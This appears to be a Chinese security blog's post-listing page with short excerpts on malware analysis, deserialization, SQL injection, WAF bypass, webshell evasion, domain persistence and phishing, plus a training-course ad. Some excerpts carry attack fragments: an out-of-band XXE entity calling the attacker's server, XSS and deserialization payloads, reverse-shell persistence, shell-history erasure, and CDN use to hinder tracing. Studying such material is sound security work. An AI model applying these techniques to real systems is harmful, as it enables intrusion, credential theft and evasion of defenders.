- 博客(88)
- 收藏
- 关注
RSS订阅原创 线下保薪班开启
如果你有意向,请联系我们,我们将询问你基本情况,包括但不限于:学历,如果是转行那么需要了解之前的工作等信息,以便我们对你有一个合理的评估,做不到的事情、达不到的薪资我们不会承诺。学习是一个双向选择的事情,你选择我们,我们也要选择你,我们有十分的把握才会收你。大家都知道我们有线上班,对于想技能提升的同学来说,线上足以满足技能提升需求,对于想转行找工作,或者学生想就业的同学来说,线上却并不是一个好的选择,担心的可能有:担心自身基础较弱怕学不懂,担心学习自制力较差。,没有达到我们承诺的薪资我们。
2023-11-17 14:03:32
327
原创 AgentTesla分析报告
Time: 07/07/2022 13:34:10<br>User Name: xxxx<br>Computer Name: WIN-UxxxxU9CJ<br>OSFullName: Microsoft Windows 7 专业版 <br>CPU: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz<br>RAM: 2703.49 MB<br><hr>
2023-10-12 14:37:08
236
原创 fastjson-BCEL不出网打法原理分析
FastJson反序列化漏洞与原生的 Java 反序列化的区别在于,FastJson 反序列化并未使用 readObject 方法,而是由 FastJson 自定一套反序列化的过程。通过在反序列化的过程中自动调用类属性的 setter 方法和 getter 方法,将JSON 字符串还原成对象,当这些自动调用的方法中存在可利用的潜在危险代码时,漏洞便产生了。fastjson用法:1.将字符串转换为json格式,通过key获取value:classjsonUser{publicstati
2023-10-12 14:35:23
559
原创 waf绕过——打狗棒法
前言 某狗可谓是比较好绕过的waf,但是随着现在的发展,某狗也是越来越难绕过了,但是也不是毫无办法,争取这篇文章给正在学习waf绕过的小白来入门一种另类的waf绕过。 环境的搭建: 环境的搭建就选择phpstudy2018+安全狗最新版(2022年10月23日前) Tip: (1)记得先在phpstudy的Apache的bin目录下初始化Apache服务,一般来说,第一次为询问是否确认,第二次为确认安装(命令:httpd.exe -k install -n apache2.4 用管理员打开) (2)上传防护
2023-10-12 14:32:32
644
原创 恶意样本自动化配置提取初探
本篇参考 github 上 [CAPEv2](CAPEv2/Emotet.py at f2ab891a278b2875c79b4f2916d086f870b54ed5 · kevoreilly/CAPEv2 (github.com)) 沙箱的提取代码,在前面奇安信攻防社区-APT 恶意 DLL 分析及 C2 配置提取(子 DLL 篇) 分析的基础上尝试编写自动化配置提取,如有错误还请指正。编写这种脚本时,你得知道你要什么功能,然后依照功能去找函数,找外部库。
2023-10-12 14:28:29
162
原创 恶意代码分析
工作越做越难,行业越来越“卷”,攻击者手法多样,国内红蓝对抗局势加剧,各行各业对复合型安全人才的需求越来越多。「如何在安全行业脱颖而出?只有不断推陈出新,通过一线实战的打磨,打通每一个环节,并在不同的领域中融会贯通,才能让自己始终处于技术的前沿。
2023-09-26 14:40:50
94
原创 WordPress wp-file-manager 文件上传漏洞 CVE-2020-25213
直接访问 http://127.0.0.1/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 可以看到响应的 id。直接访问 http://127.0.0.1/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 可以看到响应的对象。如果 $cmd 为 upload,exec方法 就调用 elFinder类 的 upload方法 了。
2023-09-13 13:51:30
778
原创 探究SpringWeb对于请求的处理过程
首先在分析spring对请求处理之前之前,首先需要了解DispatcherServlet,它是Spring MVC的核心,负责接收HTTP请求,并根据请求信息分发到相应的Controller进行处理。DispatcherServlet重要特性如下:前端控制器模式:在Spring MVC框架中,DispatcherServlet实现了前端控制器设计模式。这个模式的主要思想是提供一个中心点,所有的请求将先到达这个中心点,然后由它进行分发。
2023-09-08 18:40:25
423
原创 Linux权限维持
反弹shell脚本,一个socket服务端,vim shell.py写入。生成公私钥,回车就行(id_rsa是私钥、id_rsa.pub是公钥)在对方电脑创建目录并放入公钥(注意粘贴开头可能少个s),重启服务。vim --version,看支不支持python3。NC监听并在对方电脑执行(可能需要等一下)set +o history,停止记录。防火墙开放端口->重启->查看是否开放。history -d 序号,删除记录。填反弹IP、端口、时间、密码、进程名。先开启ssh,将原本的sshd移位。
2023-09-04 15:54:22
152
原创 SRC漏洞挖掘经验分享
状态显然不止有"成功",肯定也有"失败",不然它就没有意义了,也就是说如果存在注入,我们无需登录即可将JS注入用户界面,进而在用户登录后造成攻击。ENTITY % b SYSTEM "http://你服务器的IP/x.dtd">%b;MTIzNA==显然是base64编码后的结果,解码发现是1234,应该是用来进行身份验证的,不同用户的x值不同。结果并没有出现弹框,查看前端代码,onerror被替换为空了<img src=1 ="alert(1);</script>并没有出现弹框,说明<>被编码了。
2023-09-04 15:52:16
190
原创 关于某次授权的大型内网渗透测试
经过这次实战总结了很多小的技巧。(1)可以通过添加域管理员来上线域内的所有主机(2)可以通过cs来进行进程注入or进程迁移,来实现本机system权限的获取(3)此次实战的密码喷洒尤为重要,所以有机器用户的hash一定要进行抓取(4)SPN服务横向可以通过打邮服来进行获取域控权限(5)学习了权限维持的方法(开机自启动、winrm的横向和psexec的横向)恶补了一大波内网知识(比靶场来的实在)(1)此次通过内网渗透,虽然打了邮件服务器,但是没有通过邮件服务器来拿下DC的权限。
2023-09-04 15:50:31
138
原创 几种反序列化漏洞
当配置 session.serialize_handler = php_serialize 时,Session格式:a:1:{s:4:"user";s:3:"xxx";、s:3:"xxx";、a:2:{i:0;先访问这个生成:a:1:{s:4:"user";__wakeup绕过,大于实际值(PHP<=5.5),例:O:1:"c":100...__destruct调用,结构错误,例:O:1:"c":1:{xxx}
2023-08-30 17:56:49
786
原创 PbootCMS 3.0.4 SQL注入
所以要自己进行 POST请求(1=select 1),请求会被 request函数 处理后赋值给 $where3,然后处理 SQL语句。通过对 search 或 keyword 进行 GET请求 都可以调用 SearchController类 的 index方法。就是,并且data 只能包含中文、字母、数字、横线、点、逗号、空格,然后通过 escape_string函数 进行过滤。页面中的搜索框是对 keyword 进行 GET请求 的,但是如果用 keyword 请求,变量会被销毁。
2023-08-28 13:51:20
1193
原创 Linux权限维持
反弹shell脚本,一个socket服务端,vim shell.py写入。生成公私钥,回车就行(id_rsa是私钥、id_rsa.pub是公钥)在对方电脑创建目录并放入公钥(注意粘贴开头可能少个s),重启服务。vim --version,看支不支持python3。NC监听并在对方电脑执行(可能需要等一下)set +o history,停止记录。防火墙开放端口->重启->查看是否开放。history -d 序号,删除记录。填反弹IP、端口、时间、密码、进程名。先开启ssh,将原本的sshd移位。
2023-08-28 13:48:15
204
原创 php_webshell免杀--从0改造你的AntSword
为什么会有改造蚁剑的想法,之前看到有做冰蝎的流量加密,来看到绕过waf,改造一些弱特征,通过流量转换,跳过密钥交互。但是,冰蝎需要反编译去改造源码,再进行修复bug,也比较复杂。而AntSword相对于冰蝎来说,不限制webshell,即一句话也可以进行连接,还可以自定义编码器和解码器,可以很容易让流量做到混淆。关于蚁剑的介绍,这里就不多说了,一个连接webshell的管理器,使用前端nodejs进行编码。AntSword给我最大的好处是可以连接一句话木马,而且可以自定义编码器和解码器。
2023-08-25 14:50:46
1431
原创 记一次较为详细的某CMS代码审计
本次CMS审计花费了很多时间,一方面因为漏洞点有点多,另一方面也是初学代码审计,不太擅长,经过此次审计后对SQL注入和XSS漏洞有了进一步的了解,也学到了新的思路和知识。也希望此文章能对在学习代码审计的师傅有一些帮助。
2023-08-18 16:13:03
214
原创 反序列化与序列化过程分析
在学习反序列化的漏洞时,大致都是了解了一些知识,比如序列化就是写入对象,反序列化就是读取文件恢复对象,在这个过程中会自动调用一些方法,readObject,writeObject,静态代码块等,但是从来没有了解过这个过程是怎么样的,一直很模糊,所以在这篇文章里面会记录整个学习过程,参考的技术文章较少,可能会有错误,希望理解这里用cc2来举一个例子,并不解释cc2的原理,主要看一下是怎么写入序列化的数据和怎么读取反序列化的数据的PriorityQueue的变量组成。
2023-08-15 16:27:16
151
原创 用Yara对红队工具“打标”
YARA 通常是帮助恶意软件研究人员识别和分类恶意软件样本的工具,它基于文本或二进制模式创建恶意样本的描述规则,每个规则由一组字符串和一个布尔表达式组成,这些表达式决定了它的逻辑。但是这次我们尝试使用 YARA 作为一种扫描工具,我们根据要扫描的红队工具提取出它们特有的二进制或文本特征,希望能整理成能唯一标识该类(不同版本)的红队工具的 YARA 规则,用于对特定主机扫描时可以快速识别该主机上是否存在对应的红队工具,以加强对目标主机的了解。
2023-08-10 10:33:28
271
原创 lokibot样本分析
1.主程序在temp文件夹下释放frhdgr.exe2.并创建进程 参数为 C:\Users\xxx\AppData\Local\Temp\frhdgr.exe C:\Users\xxx \AppData\Local\Temp\vxogkynyop3.主进程退出4.frhdgr.exe自我删除 并释放C:\Users\xxx\AppData\Roaming\F503CB\B28854.exe 隐藏文件frhdgr.exe有网络连接和数据包发送等行为 数据包未加密。
2023-08-09 14:55:48
110
原创 cnvd通用型证书获取姿势
9、有些网站,没有技术支持这种字样,可以去看看网页源代码,(同样的道理,如果存在sql注入漏洞的网站没有写技术支持之类的,去看看它的网页源代码,有些开发公司会留下一些独特的注释,例如“”,这只是一个举例。因为技术有限,只能挖挖不用脑子的漏洞,平时工作摸鱼的时候通过谷歌引擎引擎搜索找找有没有大点的公司有sql注入漏洞,找的方法就很简单,网站结尾加上’,有异常就测试看看,没有马上下一家,效率至上。类似这种,灵活多变,具体的可以去网上搜,一般经常找的话每个人都会找到最适合自己的那条,一搜全是sql注入!
2023-08-07 18:01:04
246
原创 tomcat通用回显
在Processor这个组件,在上面的图上的作用是来处理http请求的,并且standardContext和Processor有一定的关系,当Tomcat接收到HTTP请求时,Processor首先会接收并解析请求,然后根据请求的URL路径等信息,将请求传递给适当的StandardContext。http-nio-8082-Acceptor 在学习tomcat整体架构的时候,稍微了解过Acceptor这个组件,他是用来处理用户发过来的请求的,然后不涉及具体的处理,直接转发给worker线程去处理。
2023-08-04 15:08:35
168
原创 用 Yara 对红队工具 “打标“
YARA 通常是帮助恶意软件研究人员识别和分类恶意软件样本的工具,它基于文本或二进制模式创建恶意样本的描述规则,每个规则由一组字符串和一个布尔表达式组成,这些表达式决定了它的逻辑。但是这次我们尝试使用 YARA 作为一种扫描工具,我们根据要扫描的红队工具提取出它们特有的二进制或文本特征,希望能整理成能唯一标识该类(不同版本)的红队工具的 YARA 规则,用于对特定主机扫描时可以快速识别该主机上是否存在对应的红队工具,以加强对目标主机的了解。
2023-08-02 15:27:10
268
原创 从SQL注入绕过最新安全狗WAF中学习fuzz
我是本地搭建的环境进行测试的 环境是phpstudy的安装我不再复述,这里简单说一下安全狗插件和安全狗的安装。
2023-08-01 10:49:01
1288
原创 【2023】无痕制作钓鱼邮件
进入后台后,左边的栏目即代表各个功能,分别是Dashboard仪表板Campaigns钓鱼事件Users & Groups用户和组Email Templates邮件模板Landing Pages钓鱼页面Sending Profiles发件策略六大功能,接下来逐一介绍此功能。整个钓鱼邮件就搭建好了,这里和以往其他文章不一样的地方在于新增了https协议让其看起来更真实,使用了cdn让蓝队增加溯源难度,更加贴合红队以及常见钓鱼攻击者的攻击手法。
2023-08-01 10:43:56
2361
原创 PPL攻击详解
PPL表示“受保护的流程”,但在此之前,只有“受保护的流程”。Windows Vista / Server 2008引入了受保护进程的概念,其目的不是保护您的数据或凭据。其最初目标是保护媒体内容并符合DRM(数字版权管理)要求。Microsoft开发了此机制,以便您的媒体播放器可以读取例如蓝光,同时防止您复制其内容。当时的要求是映像文件(即可执行文件)必须使用特殊的Windows Media证书进行数字签名(如Windows Internals的“受保护的过程”部分所述)。
2022-11-01 21:02:09
3907
原创 64位下使用回调函数实现监控
在32位的系统下,我们想要实现某些监控十分简单,只需要找到对应的API实现挂钩操作即可检测进程。但在64位系统下随着的引入,导致我们如果继续使用挂钩API的方式进行监控会出现不可控的情况发生。微软也考虑到了用户程序的开发,所以开放了方便用户调用的系统回调API函数,在64位系统下的监控,使用系统回调相对于直接hook的方式往往是更值得青睐的一方。
2022-11-01 21:01:14
1543
原创 域内持久化后门
可以使用krbtgt的NTLM hash创建作为任何用户的有效TGT。要伪造黄金票据的前提是知道域的SID和krbtgt账户的hash或者AES-256值。
2022-11-01 20:59:47
523
原创 SPN的相关利用
服务主体名称(SPN)是服务实例,可以理解为一个服务,比如mssql,http等等的唯一标识符。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN,Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。
2022-11-01 20:58:02
794
原创 关于利用rundll32执行程序的分析
最近看到了一篇有趣的文章《Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement》,介绍了利用rundll32.exe加载url.dll,通过导出函数OpenURL执行程序的方法。
2022-11-01 20:57:04
1389
原创 域内批量获取敏感文件
一般来说it机器都为工作机而非服务器,可能存在下班关机等情况,如果大多机器处于关机情况下,就会浪费比较多的时间,所以优先判断存活是很有必要的。再遍历users目录存在哪些用户,同理如果存在desktop目录创建用户名和desktop.txt。,获取机器是3个一排,然后可以通过正则删除空格,每次也麻烦,直接获取机器名更加方便。接下来就是遍历desktop目录所有文件以及文件夹内的文件。自动化工具,当然就要全自动,懒人必备。同理要获取DEF盘,这里就举例D盘。目录,如果存在该目录创建机器名。
2022-11-01 20:55:15
514
原创 域内批量解析chrome浏览器
遍历users目录如果存在```C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default``如果存在创建机器名文件夹以及对应的用户名文件夹。我们按照之前的获取域内文件同理的方法,这里就不过多讲解了。直接把内容写进out目录的Bookmarks文件了。如果存在就继续创建History文件,同理书签和密码保存位置。为1说明目标开启了不保存该网站密码,反之则保存。目录内的所有文件为文本形式。目录所有机器,创建对应的机器目录。
2022-11-01 20:54:02
1253
原创 深入注册表监控
注册表是windows的重要数据库,存放了很多重要的信息以及一些应用的设置,对注册表进行监控并防止篡改是十分有必要的。在64位系统下微软提供了这个回调函数来实时监控注册表的操作,那么既然这里微软提供了这么一个方便的接口,病毒木马自然也会利用,这里我们就来探究其实现的原理和如何利用这个回调函数进行对抗。
2022-11-01 20:51:52
1370
1
原创 x64下隐藏可执行内存
我们如果想要实现进程隐藏在3环通常会使用到PEB断链去达到隐藏进程的效果,但是那只是表面上的进程隐藏,所有内存的详细信息都会被储存在vad树里面,这里我们就来探究在64位下如何隐藏可执行内存。
2022-09-14 13:38:42
2359
原创 内核APC&用户APC详解
比如:进0环时的位置存储在EIP中,现在要提前返回,而且返回的并不是原来的位置,那就意味着必须要修改EIP为新的返回位置。那原来的值怎么办呢?结构,这里当APC是内核APC的时候存储的是真正的APC地址,当APC是用户APC的时候存储的是指向用户APC的总入口。然后修改eip,这里永远返回一个固定的位置,但是这个位置在每次系统启动的时候都不相同,存放在3环的。当线程从用户层进入内核层时,要保留原来的运行环境,比如各种寄存器,栈的位置等等 (里面存储的是内核APC的地址还是APC的的总入口,然后再跳转。
2022-09-14 13:37:02
913
原创 Demo版菜刀
upload和download分别调用uploadFile类upload方法和download类downloadFile方法。看到webshell。可以看到当cmd值为download xx的时候replace download空格为空,后面就执行download类的downloadFile方法。师傅看到这里可以就会喷了哈哈哈哈我也觉得。然后通过SendData类的PostRequest方法发送。跟进PostRequest方法。问得好,因为我直接写被干了。跟进uploadFile类的upload方法。
2022-09-14 13:35:47
325
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人